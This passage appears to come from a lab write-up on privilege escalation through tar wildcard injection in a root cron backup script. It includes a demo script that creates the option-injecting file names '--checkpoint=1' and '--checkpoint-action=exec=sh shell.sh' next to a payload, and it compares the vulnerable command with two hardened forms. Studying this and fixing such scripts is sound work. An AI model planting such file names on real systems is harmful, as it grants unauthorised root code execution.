Cron


A cron job running as root was identified and its execution flow captured. PEAS also flagged it at a later stage.

redis@readys:~$ ll /usr/local/bin/backup.sh
4.0K -rwxr-xr-x 1 root root 122 Nov 17  2021 /usr/local/bin/backup.sh
 
 
redis@readys:~$ cat /usr/local/bin/backup.sh
#!/bin/bash
 
cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fi

The Bash script looks for regular files under /var/www/html that were modified less than 3 minutes ago. If it finds at least one, it archives the contents of /var/www/html into /opt/backups/website.tar using tar. Because the cron job runs as root, tar runs as root too, and the find check means any freshly created file in that directory is enough to trigger the backup on the next run.

The /var/www/html directory is owned by the alice user. Now that lateral movement to the alice user has been made, this vector becomes viable: alice can create files with arbitrary names in the directory that the root cron job will then hand to tar.

The important bit here is the unquoted wildcard (*), used to include everything in /var/www/html. The shell expands it into one argument per non-hidden file name before tar ever runs, and GNU tar accepts options anywhere on its command line, so a file whose name starts with -- is parsed as an option rather than as a file to archive. Whoever can create files in that directory therefore controls tar's arguments in a root context. This is a privilege escalation vector; the fix is to stop the names being parsed as options, for example tar -cf /opt/backups/website.tar -- * or tar -cf /opt/backups/website.tar ./*.
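The mechanism, as an added example that is not part of the original writeup and does not reproduce the steps taken on the target: it rebuilds the backup command in a throwaway directory as the current user, seeds it with a constructed payload (shell.sh) and two option-shaped file names, and runs the cron script's form beside two hardened forms. It assumes GNU tar, whose --checkpoint and --checkpoint-action=exec options are what turn an injected argument into command execution; on a non-GNU tar it reports "skipped". The marker file and all file names are constructed for the demo.

```shell
#!/bin/bash
# Added example (not from the writeup): reproduce the wildcard injection
# against a copy of the backup command, as the current user in a temp
# directory. Needs GNU tar: --checkpoint and --checkpoint-action are GNU
# extensions, and the payload runs through them.

is_gnu_tar() { tar --version 2>/dev/null | grep -q 'GNU tar'; }

# run_backup_with FORM: seed a fake web root with a constructed payload
# (shell.sh) and two option-shaped file names, then run the backup the
# way FORM says. Prints "executed" if the payload ran, "not-executed"
# if it did not, "skipped" when tar is not GNU tar.
#   bare      tar -cf website.tar *      (what the cron script does)
#   dashdash  tar -cf website.tar -- *   (-- ends option parsing)
#   dotslash  tar -cf website.tar ./*    (no argument can start with -)
run_backup_with() {
    local form="$1" work
    case "$form" in
        bare|dashdash|dotslash) ;;
        *) echo "unknown form: $form" >&2; return 2 ;;
    esac
    is_gnu_tar || { echo skipped; return 0; }
    work=$(mktemp -d) || return 1
    mkdir "$work/site"
    echo '<html>index</html>' > "$work/site/index.html"   # innocent content
    # Payload: prove execution by touching a marker outside the web root.
    printf '#!/bin/sh\ntouch "%s/marker"\n' "$work" > "$work/site/shell.sh"
    # Attacker-chosen file names; the shell expands * into these as separate
    # arguments and GNU tar parses them as options, not as files.
    touch "$work/site/--checkpoint=1"
    touch "$work/site/--checkpoint-action=exec=sh shell.sh"
    (
        cd "$work/site" || exit 1
        case "$form" in
            bare)     tar -cf "$work/website.tar" * ;;
            dashdash) tar -cf "$work/website.tar" -- * ;;
            dotslash) tar -cf "$work/website.tar" ./* ;;
        esac
    ) >/dev/null 2>&1 || true
    if [ -e "$work/marker" ]; then echo executed; else echo not-executed; fi
    rm -rf "$work"
}

# Stand-alone run: show the three forms side by side.
for form in bare dashdash dotslash; do
    printf '%-9s %s\n' "$form" "$(run_backup_with "$form")"
done
```

Only the bare form reports "executed": the two injected names become --checkpoint=1 and --checkpoint-action=exec=sh shell.sh on tar's command line, and tar runs sh shell.sh from the web root at the first checkpoint. With -- or ./* the same names are archived as ordinary members and nothing runs. On the target the files would be created under /var/www/html as alice and tar would execute the payload as root.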